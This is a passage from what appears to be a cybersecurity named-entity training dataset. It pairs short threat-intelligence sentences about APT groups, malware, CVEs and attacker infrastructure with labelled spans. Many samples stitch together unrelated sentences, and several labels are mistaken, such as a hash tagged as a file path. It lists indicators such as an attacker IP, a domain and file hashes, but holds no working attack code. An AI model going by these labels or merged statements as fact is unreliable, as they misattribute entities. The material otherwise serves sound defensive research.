Subsequently , KillNet claimed to have compromised NATO ’s training site , Joint Advanced Distributed Learning , and published dozens of purportedly leaked images on its channels .", "spans": {"SYSTEM: Google Play Protect": [[8, 27], [339, 358]], "MALWARE: Bread": [[61, 66], [130, 135], [483, 488]], "SYSTEM: Play Store": [[81, 91]], "SYSTEM: Play": [[256, 260]], "SYSTEM: Android": [[425, 432]], "ORGANIZATION: Dragos": [[596, 602]], "SYSTEM: NATO ’s training site": [[774, 795]]}, "info": {"id": "cyberner_stix_train_001008", "source": "cyberner_stix_train"}} {"text": "The commands available are located in one of the configuration blobs mentioned earlier .", "spans": {}, "info": {"id": "cyberner_stix_train_001009", "source": "cyberner_stix_train"}} {"text": "In the next sections , for simplicity , we will continue the analysis only on the 64-bit payload . Ties to SHAPESHIFT suggest that APT33 may engage in destructive operations or shares tools or development resources with an Iranian threat group that conducts destructive operations . On top of that , the decoded payload is also encrypted with AES-128 and finally obfuscated with XOR 0x3B . This then offered a means to log on using email providers , which could then capture the passwords and user names .", "spans": {"TOOL: SHAPESHIFT": [[107, 117]], "THREAT_ACTOR: APT33": [[131, 136]], "THREAT_ACTOR: threat group": [[231, 243]]}, "info": {"id": "cyberner_stix_train_001010", "source": "cyberner_stix_train"}} {"text": "In 2014 , APT32 leveraged a spear-phishing attachment titled \" Plans to crackdown on protesters at the Embassy of Vietnam.exe , \" which targeted dissident activity among the Vietnamese diaspora in Southeast Asia . 
If a target of the spear phishing described in \" Phase 2 : malware deployment \" opened the email attachment and , crucially , clicked on the icon in the attachment , this would lead to the target 's computer becoming infected with the \" Scout \" malware tool from the RCS Galileo platform .", "spans": {"THREAT_ACTOR: APT32": [[10, 15]], "MALWARE: Vietnam.exe": [[114, 125]], "ORGANIZATION: diaspora": [[185, 193]], "MALWARE: Scout": [[451, 456]]}, "info": {"id": "cyberner_stix_train_001011", "source": "cyberner_stix_train"}} {"text": "PROMETHIUM is an activity group that has been active as early as 2012 . Using the Kaspersky Security Network ( KSN ) and artifacts from malware files and attack sites , we were able to trace the attacks back to March 2015 .", "spans": {"THREAT_ACTOR: PROMETHIUM": [[0, 10]], "THREAT_ACTOR: activity group": [[17, 31]], "ORGANIZATION: Kaspersky Security Network": [[82, 108]], "ORGANIZATION: KSN": [[111, 114]]}, "info": {"id": "cyberner_stix_train_001012", "source": "cyberner_stix_train"}} {"text": "The group runs custom batch scripts to collect specific file types and takes proactive steps to minimize detection of its activities .", "spans": {}, "info": {"id": "cyberner_stix_train_001013", "source": "cyberner_stix_train"}} {"text": "This alert contains indicators of compromise ( IOCs ) , malware descriptions , network signatures , and host-based rules to help network defenders detect activity conducted by the North Korean B-IDTY E-LOC government .", "spans": {"TOOL: indicators of compromise": [[20, 44]], "TOOL: IOCs": [[47, 51]]}, "info": {"id": "cyberner_stix_train_001014", "source": "cyberner_stix_train"}} {"text": "The trojan uses the Android Accessibility API to intercept all interactions between the user and the mobile device . Security researchers subsequently linked these attacks to a broader , yearlong campaign that targeted not just Israelis but Palestinians as well . 
ShadowHammer : https://liveupdate01s.asus.com/pub/ASUS/nb/Apps_for_Win8/LiveUpdate/Liveupdate_Test_VER362.zip . Threat actors typically register and use several domains in order to discretely lead their malware to their Command and Control ( C&C ) servers .", "spans": {"SYSTEM: Android Accessibility": [[20, 41]], "THREAT_ACTOR: ShadowHammer": [[264, 276]], "URL: https://liveupdate01s.asus.com/pub/ASUS/nb/Apps_for_Win8/LiveUpdate/Liveupdate_Test_VER362.zip": [[279, 373]], "SYSTEM: several domains": [[417, 432]]}, "info": {"id": "cyberner_stix_train_001015", "source": "cyberner_stix_train"}} {"text": "The short links in the spearphishing emails redirected victims to a TG-4127 controlled URL that spoofed a legitimate Google domain .", "spans": {"TOOL: emails": [[37, 43]], "THREAT_ACTOR: TG-4127": [[68, 75]], "ORGANIZATION: Google": [[117, 123]]}, "info": {"id": "cyberner_stix_train_001016", "source": "cyberner_stix_train"}} {"text": "On 24 March 2019 , Silence.ProxyBot (MD5 2fe01a04d6beef14555b2cf9a717615c) was uploaded to VirusTotal from an IP address in Sri Lanka . These samples appeared to have been created by OilRig during their development and testing activities , all of which share many similarities with the delivery document used in the recent OilRig attack against a Middle Eastern government , N56.15.doc ( 7cbad6b3f505a199d6766a86b41ed23786bbb99dab9cae6c18936afdc2512f00 ) that we have also included in Table 1 .", "spans": {"MALWARE: Silence.ProxyBot": [[19, 35]], "THREAT_ACTOR: OilRig": [[183, 189]], "THREAT_ACTOR: OilRig attack": [[323, 336]], "ORGANIZATION: government": [[362, 372]], "FILEPATH: N56.15.doc": [[375, 385]], "FILEPATH: 7cbad6b3f505a199d6766a86b41ed23786bbb99dab9cae6c18936afdc2512f00": [[388, 452]]}, "info": {"id": "cyberner_stix_train_001017", "source": "cyberner_stix_train"}} {"text": "In the image below , we can see a packet that was sent to the attacker ’ s C & C containing collected information along with stolen SMS data . 
PLATINUM uses a number of different custom-developed backdoors to communicate with infected computers . First identified in January 2015 , Orangeworm has also conducted targeted attacks against organizations in related industries as part of a larger supply-chain attack in order to reach their intended victims .", "spans": {"THREAT_ACTOR: PLATINUM": [[143, 151]], "TOOL: custom-developed backdoors": [[179, 205]]}, "info": {"id": "cyberner_stix_train_001018", "source": "cyberner_stix_train"}} {"text": "The OwaAuth web shell is likely created with a builder , given that the PE compile time of the binary does not change between instances and the configuration fields are padded to a specific size .", "spans": {"MALWARE: OwaAuth": [[4, 11]], "TOOL: web shell": [[12, 21]], "TOOL: PE": [[72, 74]]}, "info": {"id": "cyberner_stix_train_001019", "source": "cyberner_stix_train"}} {"text": "After decompiling the sample , we were able to document the modifications from the open-source Quasar .", "spans": {"MALWARE: Quasar": [[95, 101]]}, "info": {"id": "cyberner_stix_train_001020", "source": "cyberner_stix_train"}} {"text": "Allows an application to read or write the system settings . The attack against Samsung smart TVs was developed in cooperation with the United Kingdom's MI5/BTSS . FIN8 is a financially motivated threat group known to launch tailored spearphishing campaigns targeting the retail , restaurant , and hospitality industries .", "spans": {"ORGANIZATION: Samsung smart TVs": [[80, 97]], "THREAT_ACTOR: MI5/BTSS": [[153, 161]], "THREAT_ACTOR: FIN8": [[164, 168]]}, "info": {"id": "cyberner_stix_train_001021", "source": "cyberner_stix_train"}} {"text": "Allows applications to open network sockets . The CIA's Mobile Devices Branch (MDB) developed numerous attacks to remotely hack and control popular smart phones . 
A portion of FIN7 was run out of a front company called Combi Security .", "spans": {"THREAT_ACTOR: CIA's": [[50, 55]], "THREAT_ACTOR: FIN7": [[176, 180]], "ORGANIZATION: Combi Security": [[219, 233]]}, "info": {"id": "cyberner_stix_train_001022", "source": "cyberner_stix_train"}} {"text": "As described in the infection flow , one of the first uses of the AutoHotKey scripts is to upload a screenshot from the compromised PC . Once an exploitable page is identified , the actor will attempt to upload a PHP backdoor to gain remote access to the system .", "spans": {"MALWARE: AutoHotKey scripts": [[66, 84]]}, "info": {"id": "cyberner_stix_train_001023", "source": "cyberner_stix_train"}} {"text": "To date , all observed Snake Wine 's attacks were the result of spear phishing attempts against the victim organizations . Group-IB specialists determined that the email addresses of IT bank employees were among the recipients of these emails .", "spans": {"THREAT_ACTOR: Snake Wine": [[23, 33]], "ORGANIZATION: Group-IB": [[123, 131]], "TOOL: email": [[164, 169]], "ORGANIZATION: bank": [[186, 190]], "ORGANIZATION: employees": [[191, 200]], "TOOL: emails": [[236, 242]]}, "info": {"id": "cyberner_stix_train_001024", "source": "cyberner_stix_train"}} {"text": "Also , Bookworm uses a combination of encryption and compression algorithms to obfuscate the traffic between the system and C2 server . After the initial compromise , TG-3390 delivers the HTTPBrowser backdoor to its victims .", "spans": {"TOOL: Bookworm": [[7, 15]], "THREAT_ACTOR: TG-3390": [[167, 174]], "MALWARE: HTTPBrowser backdoor": [[188, 208]]}, "info": {"id": "cyberner_stix_train_001025", "source": "cyberner_stix_train"}} {"text": "the Android platform have received media attention . Active since 2012 , it has so far targeted Taiwanese government agencies and private organizations . This is used in some of the newer 3.22 and 3.39 samples . 
In addition , more ransomware gangs are attacking targets multiple times a month : the number of groups carrying out more than one known attack per month in the UK has climbed steadily for a year , from just one in July 2022 to eight in June 2023 .", "spans": {"SYSTEM: Android": [[4, 11]], "ORGANIZATION: government agencies": [[106, 125]], "THREAT_ACTOR: ransomware gangs": [[231, 247]]}, "info": {"id": "cyberner_stix_train_001026", "source": "cyberner_stix_train"}} {"text": "In some cases , the decompilation process will fail , and “ Agent Smith ” will try another method for infecting the original application – A binary patch , which simply provides a binary file of the “ boot ” module of “ Agent Smith ” . Buhtrap is getting better at disguising the code they inject into compromised websites . The said obfuscated script is designed to check for antivirus products . While FakeSG appears to be a newcomer , it uses different layers of obfuscation and delivery techniques that make it a threat to take seriously and which could potentially rival with SocGholish .", "spans": {"MALWARE: Agent Smith": [[60, 71], [220, 231]], "THREAT_ACTOR: Buhtrap": [[236, 243]], "TOOL: compromised websites": [[302, 322]]}, "info": {"id": "cyberner_stix_train_001027", "source": "cyberner_stix_train"}} {"text": "A ptrace_attach syscall is called . The objective of the attacks is clearly espionage – they involve gaining access to top legislative , executive and judicial bodies around the world . The malware then communicates directly with the retrieved and decoded IP address to receive commands and send stolen information . 
Once they are downloaded to the machine , they can fetch a larger backdoor which carries out the cyberespionage activities , through functions such as copy file , move file , remove file , make directory , kill process and of course , download and execute new malware and lateral movement tools .", "spans": {"THREAT_ACTOR: the cyberespionage activities": [[410, 439]]}, "info": {"id": "cyberner_stix_train_001028", "source": "cyberner_stix_train"}} {"text": "The cryptominer employed by Pacha Group , labeled Linux.GreedyAntd by Intezer , was completely undetected by all leading engines , demonstrating the sophistication of this malware . A preliminary analysis caught the attention of our Threat Analysis and Intelligence team as it yielded interesting data that , among other things , shows that Silence was targeting employees from financial entities , specifically in the Russian Federation and the Republic of Belarus .", "spans": {"TOOL: Linux.GreedyAntd": [[50, 66]], "ORGANIZATION: Intezer": [[70, 77]], "ORGANIZATION: employees": [[363, 372]], "ORGANIZATION: financial entities": [[378, 396]]}, "info": {"id": "cyberner_stix_train_001029", "source": "cyberner_stix_train"}} {"text": "Symantec has had the following protections in place to protect customers against APT28 attacks :", "spans": {"ORGANIZATION: Symantec": [[0, 8]], "THREAT_ACTOR: APT28": [[81, 86]]}, "info": {"id": "cyberner_stix_train_001030", "source": "cyberner_stix_train"}} {"text": "The theme also reflects the targeting of the group which primarily focuses on NATO members , countries in Central Asia and those neighboring Russia .", "spans": {"ORGANIZATION: NATO": [[78, 82]]}, "info": {"id": "cyberner_stix_train_001031", "source": "cyberner_stix_train"}} {"text": "iSiGHT Partners has tracked Sandworm Team for some time - and we publicly reported on some of their activities in October 2014 , when we discovered their use of a zero-day exploit , CVE-2014-4114 . 
The Poseidon Group actively targets this sort of corporate environment for the theft of intellectual property and commercial information , occasionally focusing on personal information on executives .", "spans": {"ORGANIZATION: iSiGHT Partners": [[0, 15]], "THREAT_ACTOR: Sandworm Team": [[28, 41]], "VULNERABILITY: zero-day exploit": [[163, 179]], "VULNERABILITY: CVE-2014-4114": [[182, 195]], "THREAT_ACTOR: Poseidon Group": [[202, 216]], "ORGANIZATION: executives": [[386, 396]]}, "info": {"id": "cyberner_stix_train_001032", "source": "cyberner_stix_train"}} {"text": "We were also able to analyze some GolfSpy samples sourced from the Trend Micro mobile app reputation service . Earlier this month , Securelist 's technology caught another zero-day Adobe Flash Player exploit deployed in targeted attacks . In 2018-2019 , researchers of Kaspersky Lab ’s Global Research and Analysis Team analyzed various campaigns that used the same Tactics Tools and Procedures ( TTPs ) as the historic FIN7 , leading the researchers to believe that this threat actor had remained active despite the 2018 arrests . 
\" Having infected gaming companies that do business in MMORPG , the attackers potentially get access to millions of users , \" the researchers wrote .", "spans": {"MALWARE: GolfSpy": [[34, 41]], "ORGANIZATION: Trend Micro": [[67, 78]], "ORGANIZATION: Securelist": [[132, 142]], "VULNERABILITY: zero-day Adobe Flash Player exploit": [[172, 207]], "ORGANIZATION: Kaspersky": [[269, 278]], "ORGANIZATION: Global Research and Analysis Team": [[286, 319]], "THREAT_ACTOR: FIN7": [[420, 424]], "ORGANIZATION: gaming companies": [[550, 566]], "THREAT_ACTOR: attackers": [[600, 609]]}, "info": {"id": "cyberner_stix_train_001033", "source": "cyberner_stix_train"}} {"text": "It is called KASPERAGENT based on PDB strings identified in the malware such as “ c : UsersUSADocumentsVisual Studio 2008ProjectsNew folder ( 2 ) kasperReleasekasper.pdb ” .", "spans": {"MALWARE: KASPERAGENT": [[13, 24]], "FILEPATH: c : UsersUSADocumentsVisual Studio 2008ProjectsNew folder ( 2 ) kasperReleasekasper.pdb": [[82, 169]]}, "info": {"id": "cyberner_stix_train_001034", "source": "cyberner_stix_train"}} {"text": "APT28 espionage activity has primarily targeted entities in the U.S. 
, Europe , and the countries of the former Soviet Union , including governments and militaries , defense attaches , media entities , and dissidents and figures opposed to the current Russian Government .", "spans": {"THREAT_ACTOR: APT28": [[0, 5]]}, "info": {"id": "cyberner_stix_train_001035", "source": "cyberner_stix_train"}} {"text": "Reviving MuddyC3 Used by MuddyWater ( IRAN ) APT .", "spans": {"TOOL: MuddyC3": [[9, 16]], "THREAT_ACTOR: MuddyWater": [[25, 35]], "THREAT_ACTOR: IRAN": [[38, 42]]}, "info": {"id": "cyberner_stix_train_001037", "source": "cyberner_stix_train"}} {"text": "While discussions of threats in this region often focus on \" North America \" generally or just the United States , nearly 100 campaigns during this period were either specifically targeted at Canadian organizations or were customized for Canadian audiences . The malware leverages an exploit , codenamed EternalBlue , that was released by the Shadow Brokers on April 14 , 2017 .", "spans": {"ORGANIZATION: audiences": [[247, 256]], "VULNERABILITY: exploit": [[284, 291]], "VULNERABILITY: EternalBlue": [[304, 315]], "THREAT_ACTOR: Shadow Brokers": [[343, 357]]}, "info": {"id": "cyberner_stix_train_001038", "source": "cyberner_stix_train"}} {"text": "Check Point Software So far , HummingBad has been observed using its highly privileged status only to engage in click fraud , display pop-up ads , tamper with Google Play , and install additional apps that do more of the same . Bankshot is designed to persist on a victim 's network for further exploitation ; thus the Advanced Threat Research team believes this operation is intended to gain access to specific financial organizations . APT33 : 8.26.21.221 mynetwork.ddns.net . 
Further fields of interest in the XPdb had the prefix “ responsible _ ” and contained information about the parent of the process which violated the behavioral rules .", "spans": {"ORGANIZATION: Check Point Software": [[0, 20]], "MALWARE: HummingBad": [[30, 40]], "SYSTEM: Google Play": [[159, 170]], "TOOL: Bankshot": [[228, 236]], "ORGANIZATION: Advanced Threat Research": [[319, 343]], "ORGANIZATION: financial organizations": [[412, 435]], "THREAT_ACTOR: APT33": [[438, 443]], "IP_ADDRESS: 8.26.21.221": [[446, 457]], "DOMAIN: mynetwork.ddns.net": [[458, 476]], "SYSTEM: XPdb": [[513, 517]]}, "info": {"id": "cyberner_stix_train_001039", "source": "cyberner_stix_train"}} {"text": "Scrub and verify all administrator accounts regularly .", "spans": {}, "info": {"id": "cyberner_stix_train_001040", "source": "cyberner_stix_train"}} {"text": "Why Do Desktop Trojans Use a Mobile Component ? PUTTER PANDA are a determined adversary group who have been operating for several years , conducting intelligence-gathering operations with a significant focus on the space sector . This suggests that due to the January 2017 attack , the targeted organization may have taken actions to counter known OilRig TTPs , in this case delivering malicious macro documents , causing the OilRig operators to adopt a different delivery tactic .", "spans": {"THREAT_ACTOR: PUTTER PANDA": [[48, 60]], "THREAT_ACTOR: group": [[88, 93]], "ORGANIZATION: space sector": [[215, 227]], "THREAT_ACTOR: OilRig": [[348, 354], [426, 432]], "THREAT_ACTOR: operators": [[433, 442]]}, "info": {"id": "cyberner_stix_train_001041", "source": "cyberner_stix_train"}} {"text": "We performed a more detailed analysis on this loader Trojan , which readers can view in this report ’s appendix .", "spans": {"VULNERABILITY: Trojan": [[53, 59]]}, "info": {"id": "cyberner_stix_train_001042", "source": "cyberner_stix_train"}} {"text": "Pitty Tiger group is sometimes using stolen material as spear phishing content to target other persons . 
In September 2015 Mofang launched another attack .", "spans": {"THREAT_ACTOR: Pitty Tiger group": [[0, 17]], "THREAT_ACTOR: Mofang": [[123, 129]]}, "info": {"id": "cyberner_stix_train_001043", "source": "cyberner_stix_train"}} {"text": "Once a matching intent is triggered , the respective Receiver code will be executed , leading to other HenBox behaviors being launched , which are described later . APT41 campaigns focused on the video game sector have largely affected studios and distributors in East and Southeast Asia , although global companies based in the United States have also been targeted . APT28 targets Russian rockers and dissidents Pussy Riot via spear-phishing emails .", "spans": {"THREAT_ACTOR: APT41": [[165, 170]], "ORGANIZATION: video game sector": [[196, 213]], "ORGANIZATION: global companies": [[299, 315]], "THREAT_ACTOR: APT28": [[369, 374]], "ORGANIZATION: rockers": [[391, 398]], "ORGANIZATION: dissidents Pussy Riot": [[403, 424]], "TOOL: emails": [[444, 450]]}, "info": {"id": "cyberner_stix_train_001044", "source": "cyberner_stix_train"}} {"text": "Execute a command through exploits for CVE-2017-11882 . The Winnti and Axiom group names were created by Kaspersky Lab and Symantec , respectively , for their 2013/2014 reports on the original group .", "spans": {"VULNERABILITY: CVE-2017-11882": [[39, 53]], "THREAT_ACTOR: Winnti": [[60, 66]], "ORGANIZATION: Kaspersky Lab": [[105, 118]], "ORGANIZATION: Symantec": [[123, 131]]}, "info": {"id": "cyberner_stix_train_001045", "source": "cyberner_stix_train"}} {"text": "Others may have the necessary permissions , but are missing the classes containing the fraud code . Figure 9a , below , shows detections of encounters with the Barium actors and their infrastructure , including infected computers located in Virginia , and Figure 9b , below , shows detections of encounters throughout the United States . You can also select a host and type help for a full list of commands . 
• Identify and investigate the creation , transfer , and/or execution of unauthorized Python - packaged executables ( e.g. , PyInstaller or Py2Exe ) on OT systems or systems with access to OT resources .", "spans": {"TOOL: PyInstaller": [[534, 545]], "TOOL: Py2Exe": [[549, 555]], "SYSTEM: OT systems": [[561, 571]], "SYSTEM: systems with access to OT resources": [[575, 610]]}, "info": {"id": "cyberner_stix_train_001046", "source": "cyberner_stix_train"}} {"text": "If one these commands is found , then the malware will encode the stolen data with Base64 and upload it to the command and control server . TG-3390 uses older exploits to compromise targets , and CTU researchers have not observed the threat actors using zero-day exploits as of this publication . This volume chronicles two activity groups , code-named PROMETHIUM and NEODYMIUM , both of which target individuals in a specific LOC of Europe .", "spans": {"THREAT_ACTOR: TG-3390": [[140, 147]], "ORGANIZATION: CTU": [[196, 199]], "VULNERABILITY: zero-day exploits": [[254, 271]], "THREAT_ACTOR: activity groups": [[324, 339]], "THREAT_ACTOR: PROMETHIUM": [[353, 363]], "THREAT_ACTOR: NEODYMIUM": [[368, 377]]}, "info": {"id": "cyberner_stix_train_001047", "source": "cyberner_stix_train"}} {"text": "The group has also targeted businesses operating in the South China Sea , which is a strategically important region and the focus of disputes between China and other states . 
To better understand how the adversary was operating and what other actions they had performed , CTU researchers examined cmd.exe and its supporting processes to uncover additional command line artifacts .", "spans": {"ORGANIZATION: businesses": [[28, 38]], "ORGANIZATION: CTU": [[272, 275]], "FILEPATH: cmd.exe": [[297, 304]]}, "info": {"id": "cyberner_stix_train_001048", "source": "cyberner_stix_train"}} {"text": "FireEye has uncovered a malicious document sent in spear phishing emails to multiple companies in the hospitality industry , including hotels in at least seven European countries and one Middle Eastern country in early July .", "spans": {"ORGANIZATION: FireEye": [[0, 7]]}, "info": {"id": "cyberner_stix_train_001049", "source": "cyberner_stix_train"}} {"text": "This is hardcoded and equals “ phone ” . In particular , the threat actors have exploited CVE-2011-3544 , a vulnerability in the Java Runtime Environment , to deliver the HTTPBrowser backdoor ; and CVE-2010-0738 , a vulnerability in JBoss , to compromise internally and externally accessible assets used to redirect users' web browsers to exploit code . 
NEODYMIUM is an activity group that , like PROMETHIUM , conducted an attack campaign in early May 2016 .", "spans": {"VULNERABILITY: CVE-2011-3544": [[90, 103]], "TOOL: HTTPBrowser backdoor": [[171, 191]], "VULNERABILITY: CVE-2010-0738": [[198, 211]], "TOOL: JBoss": [[233, 238]], "THREAT_ACTOR: NEODYMIUM": [[354, 363]], "THREAT_ACTOR: PROMETHIUM": [[397, 407]]}, "info": {"id": "cyberner_stix_train_001050", "source": "cyberner_stix_train"}} {"text": "We analyzed the kits , which were designed to steal information from the automotive and finance industries , launch subsequent attacks on already compromised systems , and ( possibly ) sell stolen information .", "spans": {}, "info": {"id": "cyberner_stix_train_001051", "source": "cyberner_stix_train"}} {"text": "A couple of months later , in August 2019 , a new version was released with additional banking-specific features . Given that these attacks were mostly targeted against Asia and the gaming industry , it shouldn’t be surprising they are the work of the group described in Kaspersky’s Winnti – More than just a game” . Dust Storm is a threat group that has targeted multiple industries in Japan , South Korea , the United States , Europe , and several Southeast Asian countries .", "spans": {"ORGANIZATION: gaming industry": [[182, 197]], "ORGANIZATION: Kaspersky’s": [[271, 282]], "THREAT_ACTOR: Winnti": [[283, 289]], "THREAT_ACTOR: Dust Storm": [[317, 327]]}, "info": {"id": "cyberner_stix_train_001052", "source": "cyberner_stix_train"}} {"text": "The other iOS app “ Concipit Shop ” from the same developer appeared normal and was last updated on November 2019 . During that time they poked 70 internal hosts , compromised 56 accounts , making their way from 139 attack sources ( TOR and compromised home routers ) . 
the code parses the structure in first blocks then reconnects each conditional blocks under the flattened blocks ( #1 and #2 as successors of #13 , There are three main subroutines : the first is launched when the document is opened ( e.g. , Auto_Open , Workbook_Open ) , the second creates a randomly named dynamic loading library ( DLL ) file in the user ’s temporary files folder , and the third creates a randomly named shortcut ( LNK ) file which contains code to run regsvr32.exe ( or rundll32.exe ) to launch the next stage .", "spans": {"SYSTEM: iOS": [[10, 13]]}, "info": {"id": "cyberner_stix_train_001053", "source": "cyberner_stix_train"}} {"text": "In addition , at this stage the app can process one of these commands : • Collect device info • Install app • Is online ? APT33 registered multiple domains that masquerade as Saudi Arabian aviation companies and Western organizations that together have partnerships to provide training , maintenance and support for Saudi 's military and commercial fleet . Inside the binaries the compiler left references to the names of the C source file modules used: operation_reg.c , thread_command.c and thread_upload.c . What makes COSMICENERGY unique is that based on our analysis , a contractor may have developed it as a red teaming tool for simulated power disruption exercises hosted by Rostelecom - Solar , a Russian cyber security company .", "spans": {"THREAT_ACTOR: APT33": [[122, 127]], "ORGANIZATION: aviation companies": [[189, 207]], "TOOL: C": [[426, 427]], "FILEPATH: operation_reg.c": [[454, 469]], "FILEPATH: thread_command.c": [[472, 488]], "FILEPATH: thread_upload.c": [[493, 508]], "MALWARE: COSMICENERGY": [[522, 534]], "ORGANIZATION: Rostelecom - Solar": [[682, 700]], "ORGANIZATION: Russian cyber security company": [[705, 735]]}, "info": {"id": "cyberner_stix_train_001054", "source": "cyberner_stix_train"}} {"text": "] top/ Oct 23 , 2017 hxxp : //online.bankaustria.at.id8817461 [ . 
If the attackers were able to obtain one of these EPP keys , they would be able to modify any DNS records that were managed by that particular registrar . Patchwork was also seen operating spearphishing campaigns targeting U.S. think tank groups in March and April of 2018 .", "spans": {"THREAT_ACTOR: attackers": [[73, 82]], "THREAT_ACTOR: Patchwork": [[221, 230]]}, "info": {"id": "cyberner_stix_train_001055", "source": "cyberner_stix_train"}} {"text": "The app then uses JavaScript injection to create a new script in the carrier ’ s web page to run the new function . Bahamut targeted similar Qatar-based individuals during their campaign . The second Loveusd system thread does a lot of things . In other news , a suspected LockBit affiliate named Ruslan Magomedovich Astamirov , a 20 - year - old from the Chechen Republic , was arrested in Arizona last month .", "spans": {"THREAT_ACTOR: Bahamut": [[116, 123]], "TOOL: Loveusd": [[200, 207]], "THREAT_ACTOR: LockBit": [[273, 280]], "ORGANIZATION: Ruslan Magomedovich Astamirov": [[297, 326]]}, "info": {"id": "cyberner_stix_train_001056", "source": "cyberner_stix_train"}} {"text": "PlugX — This remote access Trojan ( RAT ) is popular among PRC-based targeted threat groups .", "spans": {"MALWARE: PlugX": [[0, 5]], "MALWARE: Trojan": [[27, 33]], "ORGANIZATION: PRC-based": [[59, 68]]}, "info": {"id": "cyberner_stix_train_001057", "source": "cyberner_stix_train"}} {"text": "To prevent this , Android ’ s engineers regularly release updates that contain bug fixes designed to prevent apps from getting the list of currently running apps without explicit permission . Operation Daybreak appears to have been launched by APT37 to infect high profile targets through spear-phishing e-mails . 
The Carbon Black Threat Analysis Unit ( TAU ) An attacker could exploit these issues by tricking a user into opening a specially crafted PDF document or , if the user has the browser extension enabled , by visiting a malicious web page :", "spans": {"SYSTEM: Android": [[18, 25]], "THREAT_ACTOR: APT37": [[244, 249]], "ORGANIZATION: The Carbon Black Threat Analysis Unit": [[314, 351]], "ORGANIZATION: TAU": [[354, 357]]}, "info": {"id": "cyberner_stix_train_001058", "source": "cyberner_stix_train"}} {"text": "RIPPER will examine the contents of directories associated with the targeted ATM vendors and will replace legitimate executables with itself . In addition to the legitimate AmmyAdmin tool , the hackers used Visconti Backdoor developed based on legitimate RMS ( remote manipulator system ) software .", "spans": {"MALWARE: RIPPER": [[0, 6]], "ORGANIZATION: ATM vendors": [[77, 88]], "MALWARE: AmmyAdmin tool": [[173, 187]], "MALWARE: Visconti Backdoor": [[207, 224]], "TOOL: RMS": [[255, 258]], "TOOL: remote manipulator system": [[261, 286]]}, "info": {"id": "cyberner_stix_train_001059", "source": "cyberner_stix_train"}} {"text": "This data , when analyzed with the number of commands to send SMSs that Talos received during the investigation , lead us to conclude that the malicious operator is aggressively spreading the malware , but that does n't seem to result in the same number of new infections . Observed APT10 targeting is in line with many of the historic compromises we have outlined previously as originating from China . Earlier today , Motherboard published a story by Kim Zetter on Operation ShadowHammer , a newly discovered supply chain attack that leveraged ASUS Live Update software . 
Although COSMICENERGY does not directly overlap with any previously observed malware families , its capabilities are comparable to those employed in previous incidents and malware .", "spans": {"THREAT_ACTOR: APT10": [[283, 288]], "ORGANIZATION: Motherboard": [[420, 431]], "TOOL: ASUS Live Update": [[546, 562]], "MALWARE: COSMICENERGY": [[583, 595]]}, "info": {"id": "cyberner_stix_train_001060", "source": "cyberner_stix_train"}} {"text": "The implant provides the ability to grab a lot of exfiltrated data , like call records , text messages , geolocation , surrounding audio , calendar events , and other memory information stored on the device . Usually , the Stageless Meterpreter has the Ext_server_stdapi.x64.dll” , Ext_server_extapi.x64.dll” , and Ext_server_espia.x64.dll” extensions . TEMP.Veles is a Russia based threat group that has targeted critical infrastructure .", "spans": {"MALWARE: Stageless Meterpreter": [[223, 244]], "MALWARE: Ext_server_stdapi.x64.dll”": [[253, 279]], "MALWARE: Ext_server_extapi.x64.dll”": [[282, 308]], "MALWARE: Ext_server_espia.x64.dll”": [[315, 340]], "THREAT_ACTOR: TEMP.Veles": [[354, 364]]}, "info": {"id": "cyberner_stix_train_001061", "source": "cyberner_stix_train"}} {"text": "Until now , we haven ’ t seen targeted attacks against mobile phones , although we ’ ve seen indications that these were in development . Confucius' backdoors are delivered through Office documents exploiting memory corruption vulnerabilities CVE-2015-1641 and CVE-2017-11882 . 
The primary operational technique used by Night Dragon comprised a variety of hacker tools , including privately developed and customized RAT tools that provided complete remote administration capabilities to the attacker .", "spans": {"TOOL: Confucius'": [[138, 148]], "VULNERABILITY: CVE-2015-1641": [[243, 256]], "VULNERABILITY: CVE-2017-11882": [[261, 275]], "THREAT_ACTOR: Night Dragon": [[320, 332]], "MALWARE: RAT tools": [[416, 425]], "THREAT_ACTOR: attacker": [[491, 499]]}, "info": {"id": "cyberner_stix_train_001062", "source": "cyberner_stix_train"}} {"text": "The threat actors create PlugX DLL stub loaders that will run only after a specific date .", "spans": {"MALWARE: PlugX": [[25, 30]], "TOOL: DLL": [[31, 34]], "TOOL: loaders": [[40, 47]]}, "info": {"id": "cyberner_stix_train_001063", "source": "cyberner_stix_train"}} {"text": "Calling functionality Command PHOCAs7 initiates calling functionality . The zero-day vulnerability found and reported by Symantec (CVE-2019-0703) occurs due to the way the Windows SMB Server handles certain requests . compromised credentials to log into a victim ’s remote access infrastructure .", "spans": {"ORGANIZATION: Symantec": [[121, 129]], "VULNERABILITY: (CVE-2019-0703)": [[130, 145]]}, "info": {"id": "cyberner_stix_train_001064", "source": "cyberner_stix_train"}} {"text": "This sort of conversion allows Python code to be run in a Windows environment without pre-installed Python binaries . The attackers were meticulous in making their phishing page as credible as possible . 
Rancor uses politically-motivated lures to entice victims to open malicious documents .", "spans": {"SYSTEM: Python": [[31, 37], [100, 106]], "SYSTEM: Windows": [[58, 65]], "THREAT_ACTOR: attackers": [[122, 131]], "THREAT_ACTOR: Rancor": [[204, 210]], "TOOL: politically-motivated lures": [[216, 243]]}, "info": {"id": "cyberner_stix_train_001065", "source": "cyberner_stix_train"}} {"text": "05edd53508c55b9dd64129e944662c0d 1cf5ce3e3ea310b0f7ce72a94659ff54 352eede25c74775e6102a095fb49da8c 3b595d3e63537da654de29dd01793059 4709395fb143c212891138b98460e958 50f4464d0fc20d1932a12484a1db4342 96c317b0b1b14aadfb5a20a03771f85f ba7b1392b799c8761349e7728c2656dd de5057e579be9e3c53e50f97a9b1832b e7d92039ffc2f07496fe7657d982c80f e864f32151d6afd0a3491f432c2bb7a2 .", "spans": {"FILEPATH: 05edd53508c55b9dd64129e944662c0d": [[0, 32]], "FILEPATH: 1cf5ce3e3ea310b0f7ce72a94659ff54": [[33, 65]], "FILEPATH: 352eede25c74775e6102a095fb49da8c": [[66, 98]], "FILEPATH: 3b595d3e63537da654de29dd01793059": [[99, 131]], "FILEPATH: 4709395fb143c212891138b98460e958": [[132, 164]], "FILEPATH: 50f4464d0fc20d1932a12484a1db4342": [[165, 197]], "FILEPATH: 96c317b0b1b14aadfb5a20a03771f85f": [[198, 230]], "FILEPATH: ba7b1392b799c8761349e7728c2656dd": [[231, 263]], "FILEPATH: de5057e579be9e3c53e50f97a9b1832b": [[264, 296]], "FILEPATH: e7d92039ffc2f07496fe7657d982c80f": [[297, 329]], "FILEPATH: e864f32151d6afd0a3491f432c2bb7a2": [[330, 362]]}, "info": {"id": "cyberner_stix_train_001066", "source": 